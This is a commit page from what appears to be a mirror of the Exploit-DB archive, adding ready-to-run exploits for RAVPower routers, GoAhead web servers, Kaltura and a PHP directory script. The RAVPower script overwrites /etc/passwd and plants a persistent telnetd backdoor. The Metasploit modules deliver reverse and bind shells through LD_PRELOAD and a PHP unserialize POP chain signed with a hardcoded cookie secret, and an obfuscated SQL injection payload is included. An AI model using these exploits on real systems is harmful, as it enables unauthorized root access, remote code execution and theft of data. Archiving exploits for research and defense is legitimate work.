bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2018-01-25

Browse source 
8 changes to exploits/shellcodes

RAVPower 2.000.056 - Memory Disclosure

Acunetix WVS 10 - Local Privilege Escalation
Sync Breeze Enterprise 9.5.16 - Import Command Buffer Overflow (Metasploit)
Oracle VirtualBox < 5.1.30 / < 5.2-rc1 - Guest to Host Escape
Blizzard Update Agent - JSON RPC DNS Rebinding

NoMachine 5.3.9 - Local Privilege Escalation

Rejetto HTTP File Server (HFS) 2.3.x - Remote Command Execution (1)

Acunetix WVS 10 - Remote Command Execution
RAVPower 2.000.056 - Root Remote Code Execution
Kaltura - Remote PHP Code Execution over Cookie (Metasploit)
GoAhead Web Server - 'LD_PRELOAD' Arbitrary Module Load (Metasploit)

Vodafone Mobile Wifi - Reset Admin Password

Rejetto HTTP File Server (HFS) 2.3a/2.3b/2.3c - Remote Command Execution
Professional Local Directory Script 1.0 - SQL Injection
WordPress Plugin Email Subscribers & Newsletters 3.4.7 - Information Disclosure
This commit is contained in:
Offensive Security 2018-01-25 05:01:47 +00:00
parent a02c2710c9
commit d1b70e7a13
9 changed files with 2742 additions and 7 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

544
exploits/hardware/remote/43871.py Executable file
View file

@ -0,0 +1,544 @@
"""
# Exploit Title: RAVPower - remote root
# Date: 23/01/2018
# Exploit Authors: Daniele Linguaglossa
# Vendor Homepage: https://www.ravpower.com/
# Software Link: https://www.ravpower.com/
# Version: 2.000.056
# Tested on: OSX
# CVE : CVE-2018-5997
"""
import requests
import time
import telnetlib
PATH_PASSWD = "/etc"
FILE_PASSWD = "passwd"
PATH_VSTFUNC = "/etc/init.d"
FILE_VSTFUNC = "vstfunc"
FILE_RC = "/etc/rc.d/rc"
BACKDOOR_TERM = "export TERM=xterm"
BACKDOOR_TELNET = "/usr/sbin/telnetd &"
BASH_SHEBANG = "#!/bin/sh"
TELNETD = "/usr/sbin/telnetd -p 1111 &"
def upload(host, port, path, name, content):
user_agent = "Mozilla/5.0 (X11; Linux x86_64; rv:57.0) Gecko/20100101 Firefox/57.0"
path = "/upload.csp?uploadpath=%s&file=1515865637281" % path
url ="http://{0}:{1}{2}".format(host,port,path)
files = {'file' : ('%s' % name, content,'application/octet-stream')}
headers = {
"user-agent": user_agent
}
try:
requests.post(url,headers=headers,files=files)
return True
except:
return False
# root:admin
tmp_passwd = """root:$1$YBm5LfCo$5OEwLPLUu085z5EoDpQz7/:0:0:root:/data/UsbDisk1/Volume1:/bin/sh
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
admin:$1$QlrmwRgO$c0iSI2euV.U1Wx6yBkDBI.:15:0:admin:/data/UsbDisk1/Volume1:/bin/sh
mail:*:8:8:mail:/var/mail:/bin/sh
nobody:x:65534:65534:Nobody:/data/UsbDisk1/Volume1:/bin/sh
guest:$1$QlrmwRgO$c0iSI2euV.U1Wx6yBkDBI.:512:0:guest:/data/UsbDisk1/Volume1/Share:/bin/sh-new
"""
tmp_vstfunc = """
export PATH=/bin:/sbin:/usr/bin:/usr/sbin
# A function to stop a program.
killproc() {
local base=${1##*/}
local pid=
pid=`pidof $base`
local i
if [ -n "$pid" ]; then
for i in $pid ; do
kill -KILL $i > /dev/null 2>&1
done
fi
rm -f /var/run/$base.pid
return 0
}
# A function to find the pid of a program.
pidofproc() {
local base=${1##*/}
#First try "/var/run/*.pid" files
if [ -f "/var/run/$base.pid" ]; then
local line p pid=
read line < /var/run/$base.pid
for p in $line ; do
[ -z "$p" -a -d "/proc/$p" ] && pid="$pid $p"
done
else
pid=`pidof $1 || pidof $base`
fi
if [ -n "$pid" ]; then
echo $pid
return 0
fi
return 1
}
# Check if $pid (could be plural) are running
# Return : 0 run
# 1 stop
checkpid() {
local i
for i in $* ; do
if [ -d "/proc/$i" ]; then
return 0
fi
done
return 1
}
# Check disk exist
checkdisk() {
return $?
}
# save pid and log function
savesc() {
local i=0
if [ -n "$3" ]; then
touch /var/run/$3.pid
fi
return $?
}
# A function check start of a program.
# return: 1 not exist
# 0 exist
checkonly() {
local prgname=${1##*/}
local pid=
if [ -f "/var/run/$prgname.pid" ]; then
pid=`pidof $prgname`
if [ -n "$pid" ]; then
return 0
fi
return 1
else
pid=`pidof $prgname`
if [ -n "$pid" ]; then
if sleep 1 && checkpid $pid && sleep 1 && checkpid $pid && sleep 2 && checkpid $pid ; then
return 2
fi
fi
return 2
fi
}
# A function save etc to mtd.
# return: 1 failure
# 0 success
saveetc() {
local ret=0
/usr/sbin/etc_tools t > /dev/null 2>&1
let ret=ret+$?
# ret=$[$ret + $?]
/usr/sbin/etc_tools p > /dev/null 2>&1
let ret=ret+$?
# ret=$[$ret + $?]
return $ret
}
# A function resume mtd to etc.
# return: 1 failure
# 0 success
resumeetc() {
local ret=0
/usr/sbin/etc_tools b > /dev/null 2>&1
let ret=ret+$?
# ret=$[$ret + $?]
/usr/sbin/etc_tools u > /dev/null 2>&1
let ret=ret+$?
# ret=$[$ret + $?]
return $ret
}
# Create a lock for /var/lock
AppScriptLock() {
if [ -f /var/lock/$1.pid ]; then
return 0
else
touch /var/lock/$1.pid
return 1
fi
}
# Check a lock for /var/lock
AppScriptChkLock() {
if [ -f /var/lock/$1.pid ]; then
return 1
else
return 0
fi
}
# Delete a lock for /var/lock
AppScriptUnlock() {
if [ -f /var/lock/$1.pid ]; then
rm -rf /var/lock/$1.pid
fi
return 1
}
DISKPATH="/data/UsbDisk1/Volume1/.vst/upgrade"
ETCPATH="/boot/tmp"
ETCBKPATH="/boot/tmp/etcbackup"
DISKETCFILE="/data/UsbDisk1/Volume1/.vst/upgrade/etc.tar"
DIDKETCBKFILE="/data/UsbDisk1/Volume1/.vst/upgrade/etcbackup.tar.gz"
ETCFILE="/boot/tmp/etc.tar"
ETCBKFILETAR="/boot/tmp/etcbackup.tar"
ETCBKFILE="/boot/tmp/etcbackup.tar.gz"
FILELIST="hostname passwd shadow samba/smbpasswd fileserv/lighttpd.user dropbox baidu"
FILELIST1="hostname"
backup_etc() {
rm $ETCBKFILETAR -rf
rm $ETCBKFILE -rf
rm $ETCBKPATH -rf
# if [ ! -e $DISKPATH ];then
# mkdir -p -m 755 $DISKPATH
# fi
if [ ! -e $ETCBKPATH ]; then
mkdir -p -m 755 $ETCBKPATH
fi
if [ -z $1 ]; then
FILELISTALL=$FILELIST
else
if [ $1 == "resume" ]; then
FILELISTALL=$FILELIST1
fi
fi
for f in $FILELISTALL
do
if [ -d /etc/$f ]; then
cp -rf /etc/$f $ETCBKPATH > /dev/null 2>&1
else
if [ "$f" == "samba/smbpasswd" ]; then
if [ ! -e $ETCBKPATH/samba ]; then
mkdir -p $ETCBKPATH/samba
fi
cp -rf /etc/$f $ETCBKPATH/$f > /dev/null 2>&1
elif [ "$f" == "fileserv/lighttpd.user" ]; then
if [ ! -e $ETCBKPATH/fileserv ]; then
mkdir -p $ETCBKPATH/fileserv
fi
cp -rf /etc/$f $ETCBKPATH/$f > /dev/null 2>&1
elif [ "$f" == "serversman/cloud.conf" ]; then
if [ ! -f /etc/$f ]; then
continue
fi
if [ ! -e $ETCBKPATH/serversman ]; then
mkdir -p $ETCBKPATH/serversman
fi
cp -rf /etc/$f $ETCBKPATH/$f > /dev/null 2>&1
else
cp -rf /etc/$f $ETCBKPATH > /dev/null 2>&1
fi
fi
done
tar cvf $ETCBKFILETAR $ETCBKPATH > /dev/null 2>&1
gzip $ETCBKFILETAR
if [ -f $ETCBKFILE ]; then
cp -rf $ETCBKFILE $DIDKETCBKFILE
fi
}
backup_etc_telnet() {
rm $ETCBKFILETAR -rf
rm $ETCBKFILE -rf
rm $ETCBKPATH -rf
# if [ ! -e $DISKPATH ];then
# mkdir -p -m 755 $DISKPATH
# fi
if [ ! -e $ETCBKPATH ]; then
mkdir -p -m 755 $ETCBKPATH
fi
if [ -z $1 ]; then
FILELISTALL=$FILELIST
else
if [ $1 == "resume" ]; then
FILELISTALL=$FILELIST1
fi
fi
touch $ETCBKPATH/telnetflag
tar cvf $ETCBKFILETAR $ETCBKPATH > /dev/null 2>&1
gzip $ETCBKFILETAR
if [ -f $ETCBKFILE ]; then
cp -rf $ETCBKFILE $DIDKETCBKFILE
fi
}
restore_etc() {
if [ -f $ETCBKFILE ]; then
gunzip $ETCBKFILE
tar xvf $ETCBKFILETAR -C / > /dev/null 2>&1
for f in $FILELIST
do
if [ -d /etc/$f ]; then
echo cp -rf $ETCBKPATH/$f /etc/$f >> /tmp/restore_etc
#cp -rf $ETCBKPATH/$f /etc/$f > /dev/null 2>&1
cp -rf $ETCBKPATH/$f /etc > /dev/null 2>&1
else
if [ "$f" == "samba/smbpasswd" ]; then
echo cp -rf $ETCBKPATH/$f /etc/$f >> /tmp/restore_etc
cp -rf $ETCBKPATH/$f /etc/$f > /dev/null 2>&1
elif [ "$f" == "fileserv/lighttpd.user" ]; then
echo cp -rf $ETCBKPATH/$f /etc/$f >> /tmp/restore_etc
cp -rf $ETCBKPATH/$f /etc/$f > /dev/null 2>&1
elif [ "$f" == "serversman/cloud.conf" ]; then
if [ ! -f $ETCBKPATH/$f ]; then
continue
fi
echo cp -rf $ETCBKPATH/$f /etc/$f >> /tmp/restore_etc
cp -rf $ETCBKPATH/$f /etc/$f > /dev/null 2>&1
else
echo cp -rf $ETCBKPATH/$f /etc/$f >> /tmp/restore_etc
cp -rf $ETCBKPATH/$f /etc/$f > /dev/null 2>&1
fi
fi
done
if [ -f $ETCBKPATH/telnetflag ]; then
touch /etc/telnetflag
fi
fi
}
# A function check usb flag
# return: 0 service start
# 1 service stop
check_usb_flag() {
local ret=0
if [ -e "/proc/usbwrite" ];then
ret=`cat /proc/usbwrite`
fi
return $ret
}
###########################################################################
#
# LED operations
#
###########################################################################
led_wink_start() {
LED=`cat /proc/vsled`
if [ $LED -eq 3 ]; then
pioctl wifi 2
fi
}
led_wink_stop() {
LED=`cat /proc/vsled`
if [ $LED -eq 2 ]; then
pioctl wifi 3
fi
}
led_wink_chk() {
LED=`cat /proc/vsled`
if [ $LED -eq 2 ]; then
return 1
else
return 0
fi
}
###########################################################################
#
# Flag operation
#
###########################################################################
flagctl_get() {
if [ -e /dev/sda ]; then
trynum=0
while [ $trynum -lt 3 ]; do
retval=`/usr/sbin/flagctl disk get $1`
if [ ! -z $retval ]; then
return $retval
fi
let trynum=trynum+1
# trynum=$[$trynum+1]
sleep 1
done
fi
}
flagctl_set() {
if [ -e /dev/sda ]; then
trynum=0
while [ $trynum -lt 3 ]; do
/usr/sbin/flagctl disk set $1 $2
flagctl_get $1
if [ "$?" -eq "$2" ]; then
sync
return 1
fi
let trynum=trynum+1
# trynum=$[$trynum+1]
sleep 1
done
fi
return 0
}
###########################################################################
#
# string function
#
###########################################################################
str_func_strstr () {
if [ ${#2} -eq 0 ];then
echo "$1"
return 0
fi
case "$1" in
*$2*)
return 1
;;
*)
return 0
;;
esac
}
dev_test_host() {
nordev=`echo $1 | cut -c -3`
s_str=`ls -l /sys/block/$nordev/device`
str_func_strstr "$s_str" "host0"
if [ $? -eq 1 ]; then
return 1
fi
return 0;
}
dev_test_usb() {
nordev=`echo $1 | cut -c -3`
s_str=`ls -l /sys/block/$nordev/device`
str_func_strstr "$s_str" "usb"
if [ $? -eq 1 ]; then
return 1
fi
return 0;
}
###########################################################################
#
# Permission check functions
#
###########################################################################
# $1: device name
# $2: host/usb
# $3: if recursive, 1: enable, 0: disable
perm_change_start() {
permpid=`ps | grep "/usr/sbin/permchange $1" | cut -d' ' -f2`
if [ ! -z $permpid ]; then
return 1;
else
/usr/sbin/permchange $1 $2 $3 &
fi
}
# $1: device name
# $2: if recursive, 1: enable, 0: disable
perm_chk_start() {
dev_test_host $1
if [ $? -eq 1 ]; then
perm_change_start $1 host $2
else
perm_change_start $1 usb $2
fi
}
perm_chk_stop() {
permpid=`ps | grep "/usr/sbin/permchange $1" | cut -d' ' -f2`
if [ ! -z $permpid ]; then
for ppid in $permpid ; do
kill -9 $ppid > /dev/null 2>&1
done
fi
}
###########################################################################
# Time function
###########################################################################
timedate_settosys() {
if [ -e /etc/timedate ]; then
TIMESET=`cat /etc/timedate`
date -s $TIMESET
fi
}
timedate_save() {
date '+%Y.%m.%d-%H:%M:%S' > /etc/timedate
}
"""
print "RAVPower Remote root (0day) - By dzonerzy & r3dx0f\n\n"
host = raw_input("Insert Ravpower IP: ")
print "[*] Step 1 -> pwning /etc/passwd"
if not upload(host, 80,PATH_PASSWD,FILE_PASSWD,tmp_passwd):
print "[-] Filed to pwn /etc/passwd maybe fixed?"
exit(0)
print "[*] Step 2 -> pwning /etc/init.d/vstfunc"
if not upload(host, 80,PATH_VSTFUNC,FILE_VSTFUNC,BASH_SHEBANG+"\n"+TELNETD+"\n"+tmp_vstfunc):
print "[-] Filed to pwn /etc/init.d/vstfunc maybe fixed?"
exit(0)
t = None
print "[*] Step 3 -> Try to remove or insert SD Card or just wait for something happen (something must happen!)"
while True:
try:
print "[*] Step 3-1 -> Trying to telnet..."
t = telnetlib.Telnet(host, port=1111)
break
except:
time.sleep(5)
t.read_until(": ")
t.write("root\n")
t.read_until(": ")
t.write("admin\n")
t.read_until("# ")
print "[*] Step 4 -> pwning /etc/rc.d/rc"
t.write("echo '%s' >> %s\n" % (BACKDOOR_TERM, FILE_RC))
t.read_until("# ")
t.write("echo '%s' >> %s\n" % (BACKDOOR_TELNET, FILE_RC))
t.read_until("# ")
print "[*] Step 4-1 -> pwned!"
print "[*] Step 5 -> Saving settings"
t.write("/usr/sbin/etc_tools p\n")
t.read_until("# ")
print "[*] Step 5-1 -> Done!"
print "[*] Step 6 -> Starting telnetd"
t.write("/usr/sbin/telnetd &\n")
t.read_until("# ")
print "[*] Step 6-1 -> Done!"
print "[*] Step 7 -> Killing old telnet"
t.write("ps aux |grep 1111 | awk '{print $2}' | xargs kill -9\n")
t.read_until("# ")
print "[*] Step 7-1 -> Done!"
print "[*] Step 8 -> Restoring vstfunc"
if not upload(host, 80,PATH_VSTFUNC,FILE_VSTFUNC,BASH_SHEBANG+"\n"+tmp_vstfunc):
print "[-] Filed to pwn /etc/init.d/vstfunc fixed?"
exit(0)
print "[*] Step 8-1 -> Done!"
print "[!] PWNAGE COMPLETED! connect with root:admin"

1471
exploits/multiple/local/43878.md Normal file
View file

File diff suppressed because it is too large Load diff

391
exploits/multiple/remote/43877.rb Executable file
View file

@ -0,0 +1,391 @@
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'GoAhead Web Server LD_PRELOAD Arbitrary Module Load',
'Description' => %q{
This module triggers an arbitrary shared library load vulnerability
in GoAhead web server versions between 2.5 and that have the CGI module
enabled.
},
'Author' =>
[
'Daniel Hodson <daniel[at]elttam.com.au>', # Elttam Vulnerability Discovery & Python Exploit
'h00die', # Metasploit Module
'hdm', # Metasploit Module
],
'License' => MSF_LICENSE,
'References' =>
[
[ 'CVE', '2017-17562' ],
[ 'URL', 'https://www.elttam.com.au/blog/goahead/' ]
],
'Payload' =>
{
'Space' => 5000,
'DisableNops' => true
},
'Platform' => 'linux',
'Targets' =>
[
[ 'Automatic (Reverse Shell)',
{ 'Arch' => ARCH_CMD, 'Platform' => [ 'unix' ], 'ReverseStub' => true,
'Payload' => {
'Compat' => {
'PayloadType' => 'cmd_reverse_stub',
'ConnectionType' => 'reverse',
}
}
}
],
[ 'Automatic (Bind Shell)',
{ 'Arch' => ARCH_CMD, 'Platform' => [ 'unix' ], 'BindStub' => true,
'Payload' => {
'Compat' => {
'PayloadType' => 'cmd_bind_stub',
'ConnectionType' => 'bind'
}
}
}
],
[ 'Automatic (Command)',
{ 'Arch' => ARCH_CMD, 'Platform' => [ 'unix' ] }
],
[ 'Linux x86', { 'Arch' => ARCH_X86 } ],
[ 'Linux x86_64', { 'Arch' => ARCH_X64 } ],
[ 'Linux ARM (LE)', { 'Arch' => ARCH_ARMLE } ],
[ 'Linux ARM64', { 'Arch' => ARCH_AARCH64 } ],
[ 'Linux MIPS', { 'Arch' => ARCH_MIPS } ],
[ 'Linux MIPSLE', { 'Arch' => ARCH_MIPSLE } ],
[ 'Linux MIPS64', { 'Arch' => ARCH_MIPS64 } ],
[ 'Linux MIPS64LE', { 'Arch' => ARCH_MIPS64LE } ],
# PowerPC stubs are currently over the 16384 maximum POST size
# [ 'Linux PPC', { 'Arch' => ARCH_PPC } ],
# [ 'Linux PPC64', { 'Arch' => ARCH_PPC64 } ],
# [ 'Linux PPC64 (LE)', { 'Arch' => ARCH_PPC64LE } ],
[ 'Linux SPARC', { 'Arch' => ARCH_SPARC } ],
[ 'Linux SPARC64', { 'Arch' => ARCH_SPARC64 } ],
[ 'Linux s390x', { 'Arch' => ARCH_ZARCH } ],
],
'DefaultOptions' =>
{
'SHELL' => '/bin/sh',
},
'Privileged' => false,
'DisclosureDate' => 'Dec 18 2017', # June 9th, technically, via github commit.
'DefaultTarget' => 0))
register_options(
[
OptString.new('TARGET_URI', [false, 'The path to a CGI script on the GoAhead server'])
])
end
# Setup our mapping of Metasploit architectures to gcc architectures
def setup
super
@@payload_arch_mappings = {
ARCH_X86 => [ 'x86' ],
ARCH_X64 => [ 'x86_64' ],
ARCH_MIPS => [ 'mips' ],
ARCH_MIPSLE => [ 'mipsel' ],
ARCH_MIPSBE => [ 'mips' ],
ARCH_MIPS64 => [ 'mips64' ],
ARCH_MIPS64LE => [ 'mips64el' ],
# PowerPC stubs are currently over the 16384 maximum POST size
# ARCH_PPC => [ 'powerpc' ],
# ARCH_PPC64 => [ 'powerpc64' ],
# ARCH_PPC64LE => [ 'powerpc64le' ],
ARCH_SPARC => [ 'sparc' ],
ARCH_SPARC64 => [ 'sparc64' ],
ARCH_ARMLE => [ 'armel', 'armhf' ],
ARCH_AARCH64 => [ 'aarch64' ],
ARCH_ZARCH => [ 's390x' ],
}
# Architectures we don't offically support but can shell anyways with interact
@@payload_arch_bonus = %W{
mips64el sparc64 s390x
}
# General platforms (OS + C library)
@@payload_platforms = %W{
linux-glibc
}
end
# Use fancy payload wrappers to make exploitation a joyously lazy exercise
def cycle_possible_payloads
template_base = ::File.join(Msf::Config.data_directory, "exploits", "CVE-2017-17562")
template_list = []
template_type = nil
template_arch = nil
# Handle the generic command types first
if target.arch.include?(ARCH_CMD)
# Default to a system() template
template_type = 'system'
# Handle reverse_tcp() templates
if target['ReverseStub']
template_type = 'reverse'
end
# Handle reverse_tcp() templates
if target['BindStub']
template_type = 'bind'
end
all_architectures = @@payload_arch_mappings.values.flatten.uniq
# Prioritize the most common architectures first
%W{ x86_64 x86 armel armhf mips mipsel }.each do |t_arch|
template_list << all_architectures.delete(t_arch)
end
# Queue up the rest for later
all_architectures.each do |t_arch|
template_list << t_arch
end
# Handle the specific architecture targets next
else
template_type = 'shellcode'
target.arch.each do |t_name|
@@payload_arch_mappings[t_name].each do |t_arch|
template_list << t_arch
end
end
end
# Remove any duplicates that may have snuck in
template_list.uniq!
# Cycle through each top-level platform we know about
@@payload_platforms.each do |t_plat|
# Cycle through each template and yield
template_list.each do |t_arch|
wrapper_path = ::File.join(template_base, "goahead-cgi-#{template_type}-#{t_plat}-#{t_arch}.so.gz")
unless ::File.exist?(wrapper_path)
raise RuntimeError.new("Missing executable template at #{wrapper_path}")
end
data = ''
::File.open(wrapper_path, "rb") do |fd|
data = Rex::Text.ungzip(fd.read)
end
pidx = data.index('PAYLOAD')
if pidx
data[pidx, payload.encoded.length] = payload.encoded
end
if %W{reverse bind}.include?(template_type)
pidx = data.index("55555")
if pidx
data[pidx, 5] = datastore['LPORT'].to_s.ljust(5)
end
end
if 'reverse' == template_type
pidx = data.index("000.000.000.000")
if pidx
data[pidx, 15] = datastore['LHOST'].to_s.ljust(15)
end
end
vprint_status("Using payload wrapper 'goahead-cgi-#{template_type}-#{t_arch}'...")
yield(data)
# Introduce a small delay for the payload to stage
Rex.sleep(0.50)
# Short-circuit once we have a session
return if session_created?
end
end
end
# Start the shell train
def exploit
# Find a valid CGI target
target_uri = find_target_cgi
return unless target_uri
# Create wrappers for each potential architecture
cycle_possible_payloads do |wrapped_payload|
# Trigger the vulnerability and run the payload
trigger_payload(target_uri, wrapped_payload)
return if session_created?
end
end
# Determine whether the target is exploitable
def check
# Find a valid CGI target
target_uri = find_target_cgi
unless target_uri
return Exploit::CheckCode::Unknown
end
return Exploit::CheckCode::Vulnerable
end
# Upload and LD_PRELOAD execute the shared library payload
def trigger_payload(target_uri, wrapped_payload)
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri),
'vars_get' => {
'LD_PRELOAD' => '/proc/self/fd/0'
},
'data' => wrapped_payload
})
nil
end
# Find an exploitable CGI endpoint. These paths were identified by mining Sonar HTTP datasets
def find_target_cgi
target_uris = []
common_dirs = %W^
/
/cgi-bin/
/cgi/
^
common_exts = ["", ".cgi"]
common_cgis = %W^
admin
apply
non-CA-rev
checkCookie
check_user
chn/liveView
cht/liveView
cnswebserver
config
configure/set_link_neg
configure/swports_adjust
eng/liveView
firmware
getCheckCode
get_status
getmac
getparam
guest/Login
home
htmlmgr
index
index/login
jscript
kvm
liveView
login
login.asp
login/login
login/login-page
login_mgr
luci
main
main-cgi
manage/login
menu
mlogin
netbinary
nobody/Captcha
nobody/VerifyCode
normal_userLogin
otgw
page
rulectl
service
set_new_config
sl_webviewer
ssi
status
sysconf
systemutil
t/out
top
unauth
upload
variable
wanstatu
webcm
webmain
webproc
webscr
webviewLogin
webviewLogin_m64
webviewer
welcome
cgitest
^
if datastore['TARGET_URI'].to_s.length > 0
target_uris << datastore['TARGET_URI']
end
common_dirs.each do |cgi_dir|
common_cgis.each do |cgi_path|
common_exts.each do |cgi_ext|
target_uris << "#{cgi_dir}#{cgi_path}#{cgi_ext}"
end
end
end
print_status("Searching #{target_uris.length} paths for an exploitable CGI endpoint...")
target_uris.each do |uri|
if is_cgi_exploitable?(uri)
print_good("Exploitable CGI located at #{uri}")
return uri
end
end
print_error("No valid CGI endpoints identified")
return
end
# Use the output of LD_DEBUG=help to determine whether an endpoint is exploitable
def is_cgi_exploitable?(uri)
res = send_request_cgi({'uri' => uri, 'method' => 'POST', 'vars_get' => { 'LD_DEBUG' => 'help' }})
if res
vprint_status("Request for #{uri} returned #{res.code}: #{res.message}")
else
vprint_status("Request for #{uri} did not return a response")
end
!!(res && res.body && res.body.to_s.include?("LD_DEBUG_OUTPUT"))
end
# This sometimes determines if the CGI module is enabled, but doesn't seem
# to return the error to the client in newer versions. Unused for now.
def is_cgi_enabled?
return true
res = send_request_cgi({'uri' => "/cgi-bin"})
!!(res && res.body && res.body.to_s.include?("Missing CGI name"))
end
end

146
exploits/php/remote/43876.rb Executable file
View file

@ -0,0 +1,146 @@
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
CookieSecret = 'y3tAno3therS$cr3T'
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'Kaltura Remote PHP Code Execution over Cookie',
'Description' => %q{
This module exploits an Object Injection vulnerability in Kaltura.
By exploiting this vulnerability, unauthenticated users can execute
arbitrary code under the context of the web server user.
Kaltura makes use of a hardcoded cookie secret which allows to sign
arbitrary cookie data. After passing this signature check, the base64-
decoded data is passed to PHPs unserialize() function which allows for
code execution. The constructed object is again based on the SektionEins
Zend code execution POP chain PoC. Kaltura versions prior to 13.1.0 are
affected by this issue.
A valid entry_id (which is required for this exploit) can be obtained
from any media resource published on the kaltura installation.
This module was tested against Kaltura 13.1.0-2 installed on Ubuntu 14.04.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Robin Verton <hello@robinverton.de>',
'Mehmet Ince <mehmet@mehmetince.net>' # first kaltura rce module
],
'References' =>
[
['CVE', '2017-14143']
],
'Privileged' => false,
'Platform' => ['php'],
'Arch' => ARCH_PHP,
'Targets' => [ ['Automatic', {}] ],
'DisclosureDate' => 'Sep 12 2017',
'DefaultTarget' => 0
))
register_options(
[
OptString.new('TARGETURI', [true, 'The target URI of the Kaltura installation', '/']),
OptString.new('ENTRYID', [true, 'Valid entry ID of any media resource (example: 0_lahha4c9)', ''])
]
)
end
def check
r = rand_text_alpha(15 + rand(4))
entry_id = datastore['ENTRYID']
cmd = "print_r(#{r}).die()"
p = ""
p << "a:1:{s:1:\"z\";O:8:\"Zend_Log\":1:{s:11:\"\00*\00_writers\";"
p << "a:1:{i:0;O:20:\"Zend_Log_Writer_Mail\":5:{s:16:\"\00*\00_eventsToMail\";"
p << "a:1:{i:0;i:1;}s:22:\"\00*\00_layoutEventsToMail\";a:0:{}s:8:\"\00*\00_mail\";"
p << "O:9:\"Zend_Mail\":0:{}s:10:\"\00*\00_layout\";O:11:\"Zend_Layout\":3:{s:13:\"\00*\00_inflector\";"
p << "O:23:\"Zend_Filter_PregReplace\":2:{s:16:\"\00*\00_matchPattern\";s:7:\"/(.*)/e\";"
p << "s:15:\"\00*\00_replacement\";s:#{cmd.length.to_s}:\"#{cmd}\";}s:20:\"\00*\00_inflectorEnabled\";"
p << "b:1;s:10:\"\00*\00_layout\";s:6:\"layout\";}s:22:\"\00*\00_subjectPrependText\";N;}}};}"
encoded = Rex::Text.encode_base64(p)
hash = Rex::Text.md5("#{encoded}#{CookieSecret}")
res = send_request_cgi(
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, 'index.php', 'keditorservices', 'getAllEntries'),
'vars_get' => {
'list_type' => '15',
'entry_id' => entry_id
},
'cookie' => "userzone=#{encoded}#{hash}"
)
if res && res.redirect?
print_error("Got a redirect, maybe you are not using https? #{res.headers['Location']}")
Exploit::CheckCode::Safe
elsif res && res.body.include?(r)
Exploit::CheckCode::Vulnerable
elsif !check_entryid
print_error("Invalid ENTRYID")
Exploit::CheckCode::Safe
else
Exploit::CheckCode::Safe
end
end
def check_entryid
entry_id = datastore['ENTRYID']
res = send_request_cgi(
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, 'index.php', 'keditorservices', 'getAllEntries'),
'vars_get' => {
'list_type' => '15',
'entry_id' => entry_id
}
)
return res.body.include? entry_id
end
def exploit
entry_id = datastore['ENTRYID']
cmd = "print_r(eval(base64_decode('#{Rex::Text.encode_base64(payload.encode)}'))).die()"
p = ""
p << "a:1:{s:1:\"z\";O:8:\"Zend_Log\":1:{s:11:\"\00*\00_writers\";"
p << "a:1:{i:0;O:20:\"Zend_Log_Writer_Mail\":5:{s:16:\"\00*\00_eventsToMail\";"
p << "a:1:{i:0;i:1;}s:22:\"\00*\00_layoutEventsToMail\";a:0:{}s:8:\"\00*\00_mail\";"
p << "O:9:\"Zend_Mail\":0:{}s:10:\"\00*\00_layout\";O:11:\"Zend_Layout\":3:{s:13:\"\00*\00_inflector\";"
p << "O:23:\"Zend_Filter_PregReplace\":2:{s:16:\"\00*\00_matchPattern\";s:7:\"/(.*)/e\";"
p << "s:15:\"\00*\00_replacement\";s:#{cmd.length.to_s}:\"#{cmd}\";}s:20:\"\00*\00_inflectorEnabled\";"
p << "b:1;s:10:\"\00*\00_layout\";s:6:\"layout\";}s:22:\"\00*\00_subjectPrependText\";N;}}};}"
encoded = Rex::Text.encode_base64(p)
hash = Rex::Text.md5("#{encoded}#{CookieSecret}")
res = send_request_cgi(
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, 'index.php', 'keditorservices', 'getAllEntries'),
'vars_get' => {
'list_type' => '15',
'entry_id' => entry_id
},
'cookie' => "userzone=#{encoded}#{hash}"
)
if res && res.redirect?
print_error("Got a redirect, maybe you are not using https? #{res.headers['Location']}")
elsif res && res.code != 200
print_error('Unexpected response...')
else
print_status("Output: #{res.body}")
end
end
end

29
exploits/php/webapps/43870.txt Normal file
View file

@ -0,0 +1,29 @@
# # # # #
# Exploit Title: Professional Local Directory Script 1.0 - SQL Injection
# Dork: N/A
# Date: 23.01.2018
# Vendor Homepage: http://www.eihitech.com/
# Software Link: http://www.eihitech.com/
# Version: 1.0
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: CVE-2018-5973
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject sql commands....
#
# Proof of Concept:
#
# 1)
# http://localhost/[PATH]/sellers_subcategories.php?IndustryID=[SQL]
#
# -105++/*!08888uNiOn*/(/*!08888SelECt*/+0x3078323833313239,0x283229,0x283329,0x283429,(/*!08888Select*/+export_set(5,@:=0,(/*!08888select*/+count(*)/*!08888from*/(information_schema.columns)where@:=export_set(5,export_set(5,@,/*!08888table_name*/,0x3c6c693e,2),/*!08888column_name*/,0xa3a,2)),@,2)),0x283629,0x283729)--+-
#
# 2)
# http://localhost/[PATH]/suppliers.php?IndustryID=[SQL]&CategoryID=[SQL]
#
# # # # #

18
exploits/php/webapps/43872.html Normal file
View file

@ -0,0 +1,18 @@
# Exploit Title: WordPress Plugin Email Subscribers & Newsletters 3.4.7 - Information Disclosure
# Google Dork:
# Date: 2018-01-23
# Exploit Author: ThreatPress Security
# Vendor Homepage: http://icegram.com/
# Software Link: https://wordpress.org/plugins/email-subscribers/
# Version: 3.4.7
# Tested on: WordPress 4.9.2
# CVE :
Email Subscribers & Newsletters, a popular WordPress plugin, has just fixed the vulnerability that allows an unauthenticated user to download the entire subscriber list with names and e-mail addresses.
Exploit:
